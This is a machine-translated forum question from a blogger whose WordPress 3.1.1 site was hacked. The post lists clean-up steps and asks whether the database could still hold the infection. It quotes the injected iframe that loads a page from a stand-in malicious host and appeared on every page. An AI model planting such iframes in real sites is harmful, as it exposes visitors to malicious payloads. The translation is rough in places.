http://fakeplasticrock.com의 재미있는 WordPress 블로그 (WordPress 3.1.1 실행)가 해킹당했습니다 <iframe>
. 모든 페이지에 다음과 같이 표시되었습니다 .
<iframe src="http://evilsite.com/go/1"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
나는 다음을했다
- 내장 WordPress 업그레이드 시스템을 통해 3.1.3으로 업그레이드
- 설치된 공격 스캐너 와 (중요 이상한 파일에 대한 경고의 많은) 안티 바이러스는 (이 녹색과 깨끗하고 모든했다, 그래서 나는 제거 및 실행 후 제거)
- MySQL 비밀번호가 변경되었습니다.
- 모든 WordPress 사용자 비밀번호를 변경했습니다.
- FTP를 통해 연결하고 전체 파일 시스템을 다운로드했습니다 (크지 않은 경우 워드 프레스 전용 Linux 공유 호스트 임)
- 파일 시스템을 WordPress 3.1.3의 공식 ZIP과 비교하여 일치하지 않는 것을 제거 하거나 덮어 썼습니다 .
나는 확실히 확신한다
- 디스크의 모든 파일은 공식 WordPress 3.1.3 파일입니다
- 내 디스크 이외의 "추가"파일
/theme
, 방금 다운로드 한 Exploit Scanner 플러그인 (/uploads
폴더 다운로드), 폴더 및 기타 예상되는 파일이 거의 없습니다. 내 다른 플러그인 인 wp-recaptcha는 현재 공식 다운로드 된 버전과 일치합니다. - 나는 또한
.htaccess
파일 을 확인했는데 아무것도 잘못 보이지 않습니다.
나는 데이터베이스를 건드리지 않았지만 데이터베이스의 어떤 것이 특별한 PHP 코드 없이 어떻게 악의적으로 작동 할 수 있다고 생각 하고 있습니까?
내 WordPress 블로그가 정상적으로 표시되고 해킹이없는 것으로 보입니다 (하지만 생각합니다).